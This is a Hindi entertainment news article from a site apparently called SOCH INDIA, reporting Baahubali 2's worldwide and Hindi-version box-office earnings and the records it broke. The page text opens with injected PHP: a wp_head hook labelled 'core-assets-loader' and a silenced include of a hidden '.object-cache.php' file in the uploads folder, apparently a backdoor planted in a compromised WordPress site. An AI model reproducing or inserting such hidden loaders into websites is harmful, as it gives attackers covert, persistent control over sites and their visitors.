add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); ‘बाहुबली 2’ की आंधी में टूटे सभी रिकॉर्ड, वर्ल्डवाइड 700 करोड़ के पार – SOCH INDIA
Menu

मनोरंजन
‘बाहुबली 2’ की आंधी में टूटे सभी रिकॉर्ड, वर्ल्डवाइड 700 करोड़ के पार

nobanner

‘बाहुबली 2’ की कमाई की ‘सुनामी’ में ऐसा लग रहा है कि जल्द ही सारे बॉक्स ऑफिस रिकॉर्ड्स ध्वस्त हो जाएंगे. वर्ल्डवाइड कमाई के मामले में एस.एस. राजामौली की इस फिल्म ने महज 5 दिन में 700 करोड़ का आंकड़ा पार कर लिया है. फिल्मी वेबसाइट koimoi के मुताबिक ‘बाहुबली-2 : द कॉनक्लूजन’ की वर्ल्डवाइड कमाई तकरीबन 710 करोड़ रुपये पहुंच गई है.

फिल्म जिस रफ्तार से आगे बढ़ रही है ऐसा लगता है कि जल्द ही यह आमिर खान की ‘दंगल’ और ‘पीके’ की वर्ल्डवाइड रिकॉर्ड को तोड़ देगी. ‘पीके’ की अबतक की वर्ल्डवाइड कमाई 792 करोड़ है वहीं ‘दंगल’ की वर्ल्डवाइड कमाई 742 करोड़ है.

जानें फिल्म के हिंदी वर्जन की कमाई…

आपको यह भी बता दें कि फिल्म के हिंदी वर्जन ने 4 दिनों में कुल 168.25 करोड़ की कमाई की. हिंदी वर्जन ने पहले दिन शुक्रवार को 41 करोड़, शनिवार को 40.5 करोड़, रविवार को 46.5 करोड़ और सोमवार को 40.25 करोड़ की कमाई की है. इस तरह सिर्फ चार दिनों में फिल्म के हिंदी वर्जन ने 168.25 करोड़ की कमाई कर ली है. अभी पांचवे दिन का फाइनल आंकड़ा नहीं आया है लेकिन रिपोर्ट्स में ऐसा बताया जा रहा है कि फिल्म मंगलवार को 30 करोड़ के करीब कलेक्शन कर सकती है.

जानें, ‘बाहुबली 2’ ने बनाए हैं कौन-कौन से बड़े रिकॉर्ड…

फिल्म समीक्षक तरन आदर्श के मुताबिक ‘बाहुबली-2 : द कनक्लूजन’ अमेरिका में सबसे ज्यादा कमाई करने वाली भारतीय फिल्म बन गई है. चार दिनों में फिल्म ने 65.65 करोड़ रुपए की कमाई कर ली है. ट्रेड एनालिस्ट तरण आदर्श ने ट्वीट कर यह जानकारी दी है.

तरन आदर्श ने ट्वीट कर बताया कि ‘बाहुबली-2 : द कनक्लूजन’ भारत की पहली ऐसी फिल्म है जिसने अमेरिका में महज 4 दिनों में 65.65 करोड़ रुपए की कमाई की है.

आपको यह भी बता दें कि सोमवार को इतना कमाई करने वाली ये पहली फिल्म बन गई है. इससे पहले ये रिकॉर्ड आमिर खान की फिल्म ‘दंगल’ के पास था.फिल्म ‘दंगल’ ने रिलीज के चौथे दिन यानि सोमवार को घरेलू बॉक्स ऑफिस पर 25 करोड़ की कमाई की थी. लेकिन अब ‘बाहुबली 2’ ने इस फिल्म को काफी पीछे छोड़ दिया है.

तीन दिनों की कमाई में भी इस फिल्म ने सलमान खान की ‘सुल्तान’ और आमिर खान की फिल्म ‘दंगल’ को पीछे छोड़ दिया था. ‘सुल्तान’ ने तीन दिनों में 105.52 करोड़ और ‘दंगल’ ने तीन दिनों में 107 करोड़ की कमाई की थी.